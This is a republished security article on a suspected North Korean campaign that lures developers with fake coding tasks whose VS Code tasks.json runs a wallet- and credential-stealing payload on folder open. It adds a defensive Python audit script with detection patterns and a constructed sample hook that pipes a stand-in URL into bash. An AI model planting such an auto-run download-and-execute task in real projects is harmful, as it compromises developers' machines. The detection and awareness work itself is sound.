How a North Korean Hacker Group Uses Fake Coding Assignments to Steal Crypto Wallets

In April‑May 2026, the suspected North Korean hacker group UNK_DeadDrop sent more than 250 phishing emails to software developers, posing as recruiters or code‑review requesters and linking to malicious GitHub/GitLab repositories whose editor task configuration executes a payload as soon as the folder is opened in VS Code or Cursor, draining cryptocurrency wallets and stealing credentials.

Black & White Path
From April to May 2026, a hacker group tracked as UNK_DeadDrop, suspected of North Korean ties, emailed over 250 phishing messages to developers at nearly one hundred companies, mainly in the US tech, education, and finance sectors, with a focus on cryptocurrency firms.

1. Attack Overview

1.1 Background

Proofpoint’s research identifies the campaign as a social‑engineering operation that disguises malicious code as a "coding assignment" or code‑review request, exploiting developers’ openness to technical collaboration.

1.2 Attack Process

The attackers follow a four‑step workflow:

Step 1 – Contact Target: They reach developers via LinkedIn, GitHub, Upwork, etc., posing as recruiters or technical peers and offering high‑pay positions or collaboration projects.

Step 2 – Deliver Malicious Repository Link: The phishing email contains a link to a fabricated GitHub or GitLab repository that the victim is asked to clone and open.

Step 3 – Trigger Payload: The repository ships a crafted .vscode/tasks.json whose task is configured to run as soon as the folder is opened; opening the clone in VS Code or Cursor therefore launches the malicious command without any further user action. VS Code gates this behind its Workspace Trust prompt, whereas Cursor, according to the report, executed it silently.

Step 4 – Install Malicious Extension: The payload, masquerading as a Google service, installs a malicious VS Code extension that re‑launches the payload every time the editor is reopened, giving the attacker persistence that no longer depends on the original repository.

Attack flow diagram

2. Technical Analysis

2.1 Payload Platform Branches

The chain splits by target operating system:

Linux/macOS:

Retrieves a Go‑written RAT from the open‑source Overlord framework.

Displays a fake password dialog to capture system credentials.

Escalates to root using the stolen password.

Exports all credentials from Keychain (macOS) or Keyring (Linux).

Windows:

Executes JavaScript directly inside the VS Code editor.

Leaves no payload file on disk, sidestepping file‑based antivirus scanning.

Bypasses Chrome’s app‑bound encryption to steal saved browser passwords.

2.2 Targeted Assets

The malware scans for and steals:

Browser wallet extensions: MetaMask, Phantom, Keplr.

Desktop wallet applications: Exodus, Electrum, Ledger Live.

Browser credentials: Passwords and cookies stored in Chrome, Brave, Edge, Firefox.

After exfiltration, the malicious loader deletes its files to erase traces.

2.3 Link to the “Contagious Interview” Campaign

Proofpoint notes a clear connection to the long‑running “Contagious Interview” operation, which has used fake recruitment as a lure against developers since 2022. UNK_DeadDrop differs by relying on email delivery, industrial‑scale repository creation, and a self‑contained payload that survives infrastructure removal.

3. Domestic Impact Analysis

3.1 High‑Risk Groups

Freelance developers on platforms such as Upwork or Fiverr.

Remote workers, especially those involved in cryptocurrency projects.

Members of cryptocurrency communities who hold or manage digital assets.

Code reviewers who frequently audit open‑source repositories.

3.2 Situation in China

Similar developer‑targeted attacks have been observed since 2022, often with attackers impersonating HR personnel or technical recruiters from well‑known tech firms. The expanding domestic crypto community increases the pool of potential victims.

3.3 Mitigation Recommendations

Be wary of unfamiliar repository links; do not clone or open code claimed to be a "test task" or "code review" without verification.

VS Code users should treat the Workspace Trust prompt as a security boundary: do not click "Trust" on an unfamiliar folder, keep security.workspace.trust.enabled on, and consider setting task.allowAutomaticTasks to "off" so that folder‑open tasks never run without an explicit choice.

Test suspicious code only in isolated environments such as virtual machines or sandboxes.

Verify the background of any recruiter or interview invitation through official channels.

Prefer hardware wallets over browser extensions for managing cryptocurrency assets.

Assess GitHub repository credibility by checking stars, contributor history, and overall reputation before cloning, bearing in mind that stars and forks are cheap to fabricate and that this group creates repositories at scale: a freshly created repository with no history should be treated as untrusted regardless of its star count.
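The folder‑open mechanism from Step 3 and the "do not open unverified code" advice above can be turned into a concrete pre‑open check. The script below is an added example, not Proofpoint's or the article's tooling: it audits a cloned repository's .vscode/tasks.json for tasks whose runOptions.runOn is "folderOpen" (the VS Code auto‑run hook; Cursor reads the same file), flags download‑and‑execute or obfuscated‑launch idioms in their commands, and lists any extensions the repository recommends. The sample repository it builds, the command patterns, the example.invalid URL and the extension ID are all constructed for the demo.

```python
"""Pre-open audit of a cloned repo for VS Code / Cursor auto-run hooks.

Added example, not Proofpoint's or the article's tooling. It checks the
.vscode/tasks.json "runOptions": {"runOn": "folderOpen"} mechanism the article
describes, plus .vscode/extensions.json (recommended-extension prompts). The
sample repo it builds is constructed for this demo; patterns are heuristics.
"""
import json
import re
import tempfile
from pathlib import Path

# Download-and-execute or obfuscated-launch idioms worth a second look.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b.*\|\s*(ba|z)?sh\b",
    r"\bwget\b.*\|\s*(ba|z)?sh\b",
    r"\bpowershell\b.*(-enc\b|-e\s|Invoke-Expression|\bIEX\b|DownloadString)",
    r"\bnode\s+-e\b",
    r"\bpython3?\s+-c\b",
    r"\bbase64\s+(-d|--decode)\b",
]

def _strip_jsonc(text):
    """tasks.json is JSONC: drop /* */ blocks, full-line // comments (so URLs
    survive) and trailing commas before json.loads."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",\s*([}\]])", r"\1", text)

def load_jsonc(path):
    return json.loads(_strip_jsonc(Path(path).read_text(encoding="utf-8")))

def _command_strings(task):
    """Every command line VS Code could run for one task, including the
    per-OS overrides under "windows", "linux" and "osx"."""
    out = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if isinstance(scope, dict) and scope.get("command"):
            args = " ".join(str(a) for a in scope.get("args", []))
            out.append(f"{scope['command']} {args}".strip())
    return out

def audit_tasks(tasks_doc):
    """One finding per command of each task that auto-runs on folder open or
    matches a suspicious pattern; severity is high when both hold."""
    findings = []
    for task in tasks_doc.get("tasks", []):
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        cmds = _command_strings(task) or [f"<no command; dependsOn={task.get('dependsOn')}>"]
        for cmd in cmds:
            hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd, re.I)]
            if hidden:
                hits.append("presentation.reveal=never")  # terminal never shown
            if auto_run or hits:
                findings.append({
                    "task": task.get("label", "<unlabeled>"),
                    "auto_run": auto_run, "command": cmd, "indicators": hits,
                    "severity": "high" if auto_run and hits else "medium" if auto_run else "low",
                })
    return findings

def audit_repo(root):
    """Audit a checked-out repository before it is opened in an editor."""
    vscode = Path(root) / ".vscode"
    report = {"tasks": [], "recommended_extensions": []}
    if (vscode / "tasks.json").is_file():
        report["tasks"] = audit_tasks(load_jsonc(vscode / "tasks.json"))
    if (vscode / "extensions.json").is_file():
        recs = load_jsonc(vscode / "extensions.json").get("recommendations", [])
        report["recommended_extensions"] = list(recs)
    return report

# Constructed sample modelled on the article's pattern: a benign build task
# beside a hidden folderOpen task with a per-OS download-and-run payload.
SAMPLE_TASKS_JSON = """{
  // constructed sample for the demo, not a real repository
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "prepare-env", "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | bash",
      "windows": { "command": "powershell -w hidden -enc <constructed-placeholder>" },
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" }, },
  ]
}"""
SAMPLE_EXTENSIONS_JSON = '{ "recommendations": ["example.constructed-helper"] }'

def build_sample_repo():
    """Write the constructed sample into a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="deaddrop-demo-"))
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
    (root / ".vscode" / "extensions.json").write_text(SAMPLE_EXTENSIONS_JSON, encoding="utf-8")
    return root

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_repo()
    print(json.dumps(audit_repo(target), indent=2))
```

Run it as `python audit.py /path/to/clone` after `git clone` and before opening the folder; with no argument it audits the constructed sample and reports the hidden prepare‑env task as high severity on both its Linux/macOS and Windows command lines. The pattern list is a heuristic, so a clean report is not a guarantee, only the absence of the obvious tells; the hard controls remain leaving Workspace Trust enabled, setting task.allowAutomaticTasks to "off", and opening untrusted code only inside a VM.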

4. Conclusion

The group’s tactics have grown increasingly sophisticated: rather than attacking exchanges directly, they infiltrate developers via fake coding assignments, gradually compromising wallets. Social engineering proves to be the most potent weapon, with the weakest link being human trust rather than code flaws.

Copyright Notice: This article is originally published by 华盟网 and all rights are reserved.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.